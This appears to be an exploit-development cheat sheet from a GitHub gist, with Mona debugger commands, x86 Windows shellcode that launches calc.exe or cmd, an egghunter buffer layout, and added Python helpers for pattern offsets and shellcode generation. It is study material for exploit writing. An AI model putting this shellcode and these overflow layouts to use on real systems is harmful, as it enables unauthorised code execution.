@adon90
Last active February 22, 2021 10:06
Exploiting Tricks
Mona tricks:
---------------
!mona pc 1000 -> create a 1000-byte cyclic pattern (pattern_create); send it as the payload so EIP, ESP and the registers get overwritten with pattern bytes
!mona findmsp -> find the pattern in memory/registers and auto-calculate the EIP offset, the offset ESP points to in the pattern, and how many pattern bytes follow ESP (the "ESP size", i.e. room for the payload)
No "jmp esp" in an executable region (.text) but no DEP, so any readable bytes can be executed:
!mona asm -s "jmp esp" -> assemble it to get the opcode bytes (\xff\xe4)
!mona find -s "\xff\xe4" -m <module> -> search the whole <module> (data sections included) for those bytes; still check that the module is not rebased/ASLR and that the address contains no bad chars
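The two Mona commands above do the same thing as the following Python, added here as a worked example (it is not part of the gist): `pattern_create` builds the Metasploit-style cyclic pattern that `!mona pc` emits, `pattern_offset` does the lookup `!mona findmsp` performs, and `findmsp` puts both together for one crash. The function names, and the crash values in the usage note, are chosen for this example.

```python
"""
Cyclic pattern and offset lookup in plain Python, usable from the exploit
script without the debugger. Added example, not code from the gist.
"""
import string
import struct

# Metasploit pattern: 3-byte groups Upper-lower-digit, Aa0 Aa1 ... Aa9 Ab0 ... Zz9
MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes before the sequence would repeat


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern (msf/mona compatible)."""
    if length > MAX_UNIQUE:
        raise ValueError("only %d bytes are unique; offsets beyond that are ambiguous" % MAX_UNIQUE)
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, length=MAX_UNIQUE):
    """
    Offset of `value` in the pattern. Accepts the bytes as they sit in memory
    (b"Aa3A") or the dword a register displays (0x41336141): a 32-bit register
    shows the dword little-endian, so the integer is unpacked first.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    off = pattern_create(length).find(needle)
    if off < 0:
        raise ValueError("%r is not in the pattern" % needle)
    return off


def findmsp(eip_value, esp_bytes, length):
    """
    Mimic `!mona findmsp` for one crash: the EIP offset, the offset at which
    ESP points into the pattern, and how many pattern bytes follow ESP
    (mona's "ESP size"). `esp_bytes` are the first bytes read at ESP.
    """
    eip_off = pattern_offset(eip_value, length)
    esp_off = pattern_offset(esp_bytes[:4], length)
    return {"eip_offset": eip_off, "esp_offset": esp_off, "esp_size": length - esp_off}
```

Usage: with a 1000-byte pattern, a crash showing EIP = 0x41336141 gives `pattern_offset(0x41336141)` = 9, and `findmsp(0x41336141, bytes_read_at_esp, 1000)` returns the EIP offset, the ESP offset and the space left after ESP for the payload.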
-----------------
SHELLCODES
1. WinExec hardcoded
arwin kernel32 WinExec -> prints the address of kernel32!WinExec on this machine (no ASLR, so it is stable across runs, but it changes with OS version, service pack and language)
--------------------------
shellcode = (b"\x33\xc0"              # xor eax,eax
             b"\x50"                  # push eax            ; NUL terminator
             b"\x68\x2E\x65\x78\x65"  # push 0x6578652E     ; ".exe"
             b"\x68\x63\x61\x6C\x63"  # push 0x636C6163     ; "calc"  -> "calc.exe\0" at ESP
             b"\x8B\xC4"              # mov eax,esp         ; pointer to the string
             b"\x6A\x01"              # push 1              ; uCmdShow = SW_SHOWNORMAL
             b"\x50"                  # push eax            ; lpCmdLine
             b"\xBB\xED\x2A\x86\x7C"  # mov ebx,0x7C862AED  ; WinExec address extracted with arwin
             b"\xFF\xD3")             # call ebx            ; WinExec("calc.exe", 1)
-------------------------------------
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://github.com/73696e65/windows-exploits/blob/master/arwin.exe
2. GetProcAddress + LoadLibraryA (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))
Look up the pointers to GetProcAddress and LoadLibraryA in the binary's .rdata (its import table), starting from the EntryPoint:
Search For > Name in all Modules
Find the address of the pointer with Follow in Dump and use that address (the slot that holds the function pointer, not the function itself) as the operand of call dword ptr [imm32] (\xff\x15).
Caveat: the two operands in the listing below, 0x7C801D7B and 0x7C80AE40, are the well-known Windows XP SP2 addresses of kernel32!LoadLibraryA and kernel32!GetProcAddress themselves; \xff\x15 dereferences its operand, so if what you have is the function address, call it directly instead (mov ebx,addr / call ebx: \xbb <addr> \xff\xd3, as in shellcode 1).
------------------------------------------------
shellcode  = b"\x31\xC9"                 # xor ecx,ecx
shellcode += b"\x51"                     # push ecx                    ; NUL terminator
shellcode += b"\x68\x2e\x64\x6c\x6c"     # push ".dll"
shellcode += b"\x68\x65\x6c\x33\x32"     # push "el32"
shellcode += b"\x68\x6b\x65\x72\x6e"     # push "kern"                 ; "kernel32.dll\0" at ESP
shellcode += b"\x54"                     # push esp                    ; lpLibFileName
shellcode += b"\xff\x15\x7b\x1d\x80\x7c" # call dword ptr [0x7C801D7B] ; *LoadLibraryA -> eax = HMODULE of kernel32
shellcode += b"\x31\xC9"                 # xor ecx,ecx                 ; ecx is clobbered by the call, zero it again
shellcode += b"\x68\x78\x65\x63\x20"     # push "xec "
shellcode += b"\x68\x57\x69\x6e\x45"     # push "WinE"                 ; "WinExec " at ESP
shellcode += b"\x88\x4c\x24\x07"         # mov byte [esp+7],cl         ; overwrite the padding space with NUL -> "WinExec\0"
shellcode += b"\x54"                     # push esp                    ; lpProcName
shellcode += b"\x50"                     # push eax                    ; hModule (LoadLibraryA's return value)
shellcode += b"\xff\x15\x40\xae\x80\x7c" # call dword ptr [0x7C80AE40] ; *GetProcAddress -> eax = WinExec
shellcode += b"\x31\xC9"                 # xor ecx,ecx
shellcode += b"\x51"                     # push ecx                    ; NUL terminator
shellcode += b"\x68\x2e\x65\x78\x65"     # push ".exe"
shellcode += b"\x68\x63\x61\x6c\x63"     # push "calc"                 ; "calc.exe\0" at ESP
shellcode += b"\x89\xe2"                 # mov edx,esp                 ; lpCmdLine
shellcode += b"\x6a\x01"                 # push 1                      ; uCmdShow = SW_SHOWNORMAL
shellcode += b"\x52"                     # push edx                    ; lpCmdLine
shellcode += b"\xff\xd0"                 # call eax                    ; eax is GetProcAddress's return value (WinExec)
------------------------------------------------------
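Shellcodes 1 and 2 build their strings by hand: push a zero, then push the string four bytes at a time, last chunk first, padding short chunks with a space. The following Python, added as a worked example (not code from the gist or from the linked tutorials), generates those push sequences, rebuilds shellcode 1 from a command line plus a WinExec address, and reports NUL bytes; it also handles the case where the padding space is not acceptable (an export name passed to GetProcAddress must match exactly). `push_string`, `winexec_hardcoded` and `bad_chars` are names chosen for this example.

```python
"""
Push-immediate string encoder and shellcode 1 generator. Added example, not
code from the gist.
"""
import struct

# Register used to produce the zero: (xor reg,reg ; push reg ; /r field for reg8 in a ModRM byte)
ZERO_REG = {
    "eax": (b"\x33\xc0", b"\x50", 0),   # shellcode 1 style
    "ecx": (b"\x31\xc9", b"\x51", 1),   # shellcode 2 style: leaves eax (a return value) untouched
}


def push_string(s, zero_reg="eax", exact=False):
    """
    Code that leaves NUL-terminated `s` at ESP. Lengths that are not a multiple
    of 4 are padded with spaces, which WinExec/CreateProcess ignore at the end
    of a command line. For an export name the padding is not harmless, so
    exact=True overwrites the padding bytes with NUL afterwards
    (mov byte [esp+k], reg8), turning "WinExec " into "WinExec\0".
    """
    data = s.encode()
    xor, push, r = ZERO_REG[zero_reg]
    pad = (-len(data)) % 4
    padded = data + b" " * pad
    code = xor + push                      # zero the register and push it: the terminator
    for i in range(len(padded) - 4, -1, -4):
        code += b"\x68" + padded[i:i + 4]  # push imm32; the chunk is already in memory order
    if exact and pad:
        base = len(padded) - 4             # ESP offset of the padded (first pushed) chunk
        for k in range(4 - pad, 4):
            off = base + k
            if off > 127:
                raise ValueError("disp8 overflow; string too long for this encoder")
            # mov byte [esp+off], reg8  ->  88 /r with SIB 0x24 (base=esp) and disp8
            code += b"\x88" + bytes([0x44 | (r << 3)]) + b"\x24" + bytes([off])
    return code


def winexec_hardcoded(cmdline, winexec_addr, show=1):
    """Shellcode 1: WinExec(cmdline, show) through a hardcoded (arwin-extracted) address."""
    code = push_string(cmdline)                        # "cmdline\0" at ESP, eax = 0
    code += b"\x8b\xc4"                                # mov eax,esp
    code += b"\x6a" + bytes([show])                    # push <show>  (imm8, sign-extended; keep it < 0x80)
    code += b"\x50"                                    # push eax     (lpCmdLine)
    code += b"\xbb" + struct.pack("<I", winexec_addr)  # mov ebx, WinExec
    code += b"\xff\xd3"                                # call ebx
    return code


def bad_chars(code, banned=b"\x00"):
    """Offsets of banned bytes; the hardcoded address is the usual source of a NUL."""
    return [i for i, b in enumerate(code) if b in banned]
```

`winexec_hardcoded("calc.exe", 0x7C862AED)` reproduces shellcode 1 byte for byte, and `push_string("WinExec", "ecx", exact=True)` gives the two pushes from shellcode 2 followed by the `mov byte [esp+7],cl` that terminates the name. Run `bad_chars` on the result before use: an address such as 0x7C800000 puts two NULs right inside the `mov ebx` immediate.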
3. Resolve the API from the PEB instead of hardcoding addresses (position independent, null-free)
----------------------------------------------------------
The listing below (from the first link) walks PEB -> Ldr -> InInitializationOrderModuleList until it finds kernel32 (it checks the '3' of the UNICODE "kernel32" name), parses kernel32's export table for the name starting "Crea" with "oces" at +8 (CreateProcessA), and calls it with a zeroed STARTUPINFO/PROCESS_INFORMATION block. Note that this listing resolves CreateProcessA, not WinExec; the second link does the same for WinExec.
shellcode = (b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"  # xor ebx,ebx ; mov edi,fs:[ebx+0x30] (PEB) ; mov edi,[edi+0xc] (Ldr)
             b"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"  # mov edi,[edi+0x1c] (InInitOrder list) ; mov eax,[edi+8] (DllBase)
             b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"  # mov esi,[edi+0x20] (BaseDllName) ; mov edi,[edi] (next) ; cmp byte [esi+0xc],'3'
             b"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"  # jnz (next module) ; mov edi,eax ; add edi,[eax+0x3c] (PE header)
             b"\x57\x78\x01\xc2\x8b\x7a\x20\x01"  # mov edx,[edi+0x78] (export dir RVA) ; add edx,eax ; mov edi,[edx+0x20] (AddressOfNames)
             b"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"  # add edi,eax ; mov ebp,ebx (index 0) ; mov esi,[edi+ebp*4] ; add esi,eax
             b"\x45\x81\x3e\x43\x72\x65\x61\x75"  # inc ebp ; cmp dword [esi],"Crea" ; jnz (next name)
             b"\xf2\x81\x7e\x08\x6f\x63\x65\x73"  # cmp dword [esi+8],"oces"
             b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"  # jnz (next name) ; mov edi,[edx+0x24] (AddressOfNameOrdinals) ; add edi,eax
             b"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"  # mov bp,[edi+ebp*2] ; mov edi,[edx+0x1c] (AddressOfFunctions) ; add edi,eax
             b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"  # mov edi,[edi+ebp*4-4] ; add edi,eax (edi = CreateProcessA) ; mov ecx,ebx
             b"\xb1\xff\x53\xe2\xfd"              # mov cl,0xff ; push ebx ; loop -> 255 zero dwords (STARTUPINFO / PROCESS_INFORMATION)
             b"\x68\x63\x6d\x64\x20"              # push "cmd "  <- payload (the trailing space is padding; the zeros above terminate it)
             b"\x89\xe2\x52\x52\x53\x53"          # mov edx,esp ; push edx (lpProcessInformation) ; push edx (lpStartupInfo) ; push 0 ; push 0
             b"\x53\x53\x53\x53\x52\x53\xff\xd7") # push 0 x4 ; push edx (lpCommandLine) ; push 0 (lpApplicationName) ; call edi
---------------------------------------------------------
https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/
Egghunter
------------
# hunter: the egghunter bytes; jmp_esp: the packed 4-byte JMP ESP address; nops: assumed to be 50 NOPs, matching the -50 in the filler length
nops = "\x90" * 50
evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF"
Layout: filler, a NOP sled, the hunter, 5 NOPs, the JMP ESP address that overwrites EIP, then a 5-byte jump backwards (\xE9\xC0\xFF\xFF\xFF = jmp -0x40: 64 bytes back from the end of that instruction). After the ret, ESP points right behind the saved return address, so JMP ESP executes the backwards jump, which lands in the NOP sled (for a 32-byte hunter, 18 bytes before it) and slides into the hunter.
Important to put NOPs between the hunter and the JMP ESP, and to recompute the rel32 of the backwards jump if the sled or the hunter size changes: with the fixed -0x40 a hunter of 50 bytes or more puts the landing point inside the hunter instead of the sled.
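The backwards jump is the fragile part of this layout, so the following Python, added as a worked example (not code from the gist), builds the same stage but derives the `jmp rel32` from the offsets instead of hardcoding \xE9\xC0\xFF\xFF\xFF, then decodes the jump and checks it lands on a NOP ahead of the hunter. The hunter used is Matt Miller's 32-byte NtDisplayString egghunter (tag "w00t"); the EIP offset 515 and the JMP ESP address 0x625011AF are placeholders for this example, and `build_stage`, `landing`, `lands_in_sled` and `fixed_jmp_ok` are names chosen here.

```python
"""
Egghunter stage layout with a computed backwards jump. Added example, not
code from the gist; hunter, EIP offset and JMP ESP address are placeholders.
"""
import struct

# Matt Miller's NtDisplayString egghunter (32 bytes, egg "w00t"); stands in for `hunter`
HUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
          b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


def jmp_rel32(at, target):
    """E9 rel32 for a jmp located at buffer offset `at`; rel counts from the end of the instruction."""
    return b"\xe9" + struct.pack("<i", target - (at + 5))


def build_stage(hunter, jmp_esp, eip_offset, sled=50, spacer=5, filler=b"A"):
    """
    filler | sled NOPs | hunter | spacer NOPs | JMP ESP addr (at eip_offset) | jmp back
    After the ret, ESP points just past the saved EIP, so the jmp back is the
    first thing JMP ESP executes; it is encoded to land in the middle of the sled.
    Returns the buffer and the offsets needed to check it.
    """
    hunter_start = eip_offset - spacer - len(hunter)
    sled_start = hunter_start - sled
    if sled_start < 0:
        raise ValueError("eip_offset too small for sled + hunter + spacer")
    jmp_back_at = eip_offset + 4                   # first byte after the 4-byte EIP overwrite
    jmp_back = jmp_rel32(jmp_back_at, sled_start + sled // 2)
    buf = (filler * sled_start + b"\x90" * sled + hunter + b"\x90" * spacer
           + struct.pack("<I", jmp_esp) + jmp_back)
    return buf, {"sled_start": sled_start, "hunter_start": hunter_start, "jmp_back_at": jmp_back_at}


def landing(buf, jmp_back_at):
    """Decode the E9 at jmp_back_at and return the buffer offset it transfers to."""
    if buf[jmp_back_at] != 0xE9:
        raise ValueError("no jmp rel32 at offset %d" % jmp_back_at)
    rel = struct.unpack("<i", buf[jmp_back_at + 1:jmp_back_at + 5])[0]
    return jmp_back_at + 5 + rel


def lands_in_sled(buf, layout):
    """True if the jmp back lands on a NOP between sled_start and the hunter."""
    off = landing(buf, layout["jmp_back_at"])
    return layout["sled_start"] <= off < layout["hunter_start"] and buf[off] == 0x90


def fixed_jmp_ok(hunter_len, rel=-64, sled=50, spacer=5):
    """Does the gist's constant jmp (-0x40) still land in the sled for this hunter size?"""
    # offsets relative to the EIP overwrite E: the jmp back ends at E+9,
    # the hunter spans [E-spacer-h, E-spacer), the sled the `sled` bytes before it
    target = 9 + rel
    sled_lo = -spacer - hunter_len - sled
    sled_hi = -spacer - hunter_len
    return sled_lo <= target < sled_hi


if __name__ == "__main__":
    buf, layout = build_stage(HUNTER, 0x625011AF, 515)
    print(len(buf), layout, landing(buf, layout["jmp_back_at"]), lands_in_sled(buf, layout))
    print(fixed_jmp_ok(32), fixed_jmp_ok(60))
```

`jmp_rel32` reproduces the gist's constant when the distance is 64 bytes, and `fixed_jmp_ok` shows why the constant cannot simply be kept when the hunter grows: for a 32-byte hunter it lands in the sled, for a 60-byte hunter it lands inside the hunter itself.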